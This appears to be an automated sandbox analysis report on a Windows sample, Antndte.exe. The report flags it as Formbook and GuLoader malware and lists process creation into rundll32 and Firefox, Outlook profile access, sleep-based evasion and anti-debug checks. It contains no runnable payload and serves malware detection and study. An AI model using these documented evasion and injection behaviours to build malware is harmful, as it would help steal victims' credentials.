        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587FD272_2_3587FD27
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C9DD02_2_357C9DD0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35877D4C2_2_35877D4C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D2DB02_2_357D2DB0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C3C602_2_357C3C60
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35859C982_2_35859C98
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CAC202_2_357CAC20
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3588ACEB2_2_3588ACEB
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B0C122_2_357B0C12
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DFCE02_2_357DFCE0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D8CDF2_2_357D8CDF
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586EC4C2_2_3586EC4C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3587EC602_2_3587EC60
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_35876C692_2_35876C69
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 3582E692 appears 62 times
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 35807BE4 appears 58 times
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 3583EF10 appears 66 times
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 357AB910 appears 123 times
        Source: Antndte.exe, 00000002.00000003.10003571766.000000003554F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000003.10007207105.0000000035707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000003.10054010523.00000000354AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000002.10110110994.0000000035A50000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: C:\Users\user\Desktop\Antndte.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeSection loaded: edgegdi.dllJump to behavior
        Source: Antndte.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/11@27/19
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_004046E6 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004020FE
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Users\Public\Pictures\KenotismJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Users\user\AppData\Local\Temp\nsh111F.tmpJump to behavior
        Source: Antndte.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Antndte.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: Antndte.exeReversingLabs: Detection: 16%
        Source: C:\Users\user\Desktop\Antndte.exeFile read: C:\Users\user\Desktop\Antndte.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exe
        Source: C:\Users\user\Desktop\Antndte.exeProcess created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exe
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\Antndte.exeProcess created: C:\Users\user\Desktop\Antndte.exe C:\Users\user\Desktop\Antndte.exeJump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Antndte.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: czazZqNSMxullu.exe, 00000004.00000002.14741699612.0000000000CAE000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: wntdll.pdbUGP source: Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Antndte.exe, Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.9988850854.0000000007029000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.9987160663.0000000000740000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Antndte.exe PID: 8040, type: MEMORYSTR
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Antndte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F1763 rdtsc 2_2_357F1763
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9853Jump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468Thread sleep count: 9853 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 2468Thread sleep time: -19706000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472Thread sleep count: 41 > 30Jump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472Thread sleep time: -205000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472Thread sleep count: 87 > 30Jump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472Thread sleep time: -87000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472Thread sleep count: 75 > 30Jump to behavior
        Source: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe TID: 2472Thread sleep time: -112500s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
        Source: Antndte.exe, 00000002.00000002.10097194599.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004311607.00000000053B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\Antndte.exeAPI call chain: ExitProcess graph end nodegraph_0-4629
        Source: C:\Users\user\Desktop\Antndte.exeAPI call chain: ExitProcess graph end nodegraph_0-4633
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F1763 rdtsc 2_2_357F1763
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E43
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3586F582 mov eax, dword ptr fs:[00000030h]2_2_3586F582
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3582E588 mov eax, dword ptr fs:[00000030h]2_2_3582E588
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3582E588 mov eax, dword ptr fs:[00000030h]2_2_3582E588
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CC560 mov eax, dword ptr fs:[00000030h]2_2_357CC560
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358385AA mov eax, dword ptr fs:[00000030h]2_2_358385AA
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B254C mov eax, dword ptr fs:[00000030h]2_2_357B254C
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357CE547 mov eax, dword ptr fs:[00000030h]2_2_357CE547
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E6540 mov eax, dword ptr fs:[00000030h]2_2_357E6540
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E8540 mov eax, dword ptr fs:[00000030h]2_2_357E8540
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A753F mov eax, dword ptr fs:[00000030h]2_2_357A753F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A753F mov eax, dword ptr fs:[00000030h]2_2_357A753F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357A753F mov eax, dword ptr fs:[00000030h]2_2_357A753F
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_358305C6 mov eax, dword ptr fs:[00000030h]2_2_358305C6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2539 mov eax, dword ptr fs:[00000030h]2_2_357F2539
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B3536 mov eax, dword ptr fs:[00000030h]2_2_357B3536
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B3536 mov eax, dword ptr fs:[00000030h]2_2_357B3536
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C252B mov eax, dword ptr fs:[00000030h]2_2_357C252B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C252B mov eax, dword ptr fs:[00000030h]2_2_357C252B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C252B mov eax, dword ptr fs:[00000030h]2_2_357C252B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C252B mov eax, dword ptr fs:[00000030h]2_2_357C252B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C252B mov eax, dword ptr fs:[00000030h]2_2_357C252B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C252B mov eax, dword ptr fs:[00000030h]2_2_357C252B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357C252B mov eax, dword ptr fs:[00000030h]2_2_357C252B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E1527 mov eax, dword ptr fs:[00000030h]2_2_357E1527
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D1514 mov eax, dword ptr fs:[00000030h]2_2_357D1514
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D1514 mov eax, dword ptr fs:[00000030h]2_2_357D1514
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D1514 mov eax, dword ptr fs:[00000030h]2_2_357D1514
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D1514 mov eax, dword ptr fs:[00000030h]2_2_357D1514
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D1514 mov eax, dword ptr fs:[00000030h]2_2_357D1514
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357D1514 mov eax, dword ptr fs:[00000030h]2_2_357D1514
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EC50D mov eax, dword ptr fs:[00000030h]2_2_357EC50D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EC50D mov eax, dword ptr fs:[00000030h]2_2_357EC50D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AB502 mov eax, dword ptr fs:[00000030h]2_2_357AB502
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357DE507 mov eax, dword ptr fs:[00000030h]2_2_357DE507
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B2500 mov eax, dword ptr fs:[00000030h]2_2_357B2500
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583C5FC mov eax, dword ptr fs:[00000030h]2_2_3583C5FC
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E15EF mov eax, dword ptr fs:[00000030h]2_2_357E15EF
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EA5E7 mov ebx, dword ptr fs:[00000030h]2_2_357EA5E7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EA5E7 mov eax, dword ptr fs:[00000030h]2_2_357EA5E7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB5E0 mov eax, dword ptr fs:[00000030h]2_2_357BB5E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB5E0 mov eax, dword ptr fs:[00000030h]2_2_357BB5E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB5E0 mov eax, dword ptr fs:[00000030h]2_2_357BB5E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB5E0 mov eax, dword ptr fs:[00000030h]2_2_357BB5E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB5E0 mov eax, dword ptr fs:[00000030h]2_2_357BB5E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357BB5E0 mov eax, dword ptr fs:[00000030h]2_2_357BB5E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3583C51D mov eax, dword ptr fs:[00000030h]2_2_3583C51D
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov ecx, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov ecx, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_3585F51B mov eax, dword ptr fs:[00000030h]2_2_3585F51B
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357E65D0 mov eax, dword ptr fs:[00000030h]2_2_357E65D0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357EC5C6 mov eax, dword ptr fs:[00000030h]2_2_357EC5C6
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357AF5C7 mov eax, dword ptr fs:[00000030h]2_2_357AF5C7
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B45B0 mov eax, dword ptr fs:[00000030h]2_2_357B45B0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357B45B0 mov eax, dword ptr fs:[00000030h]2_2_357B45B0
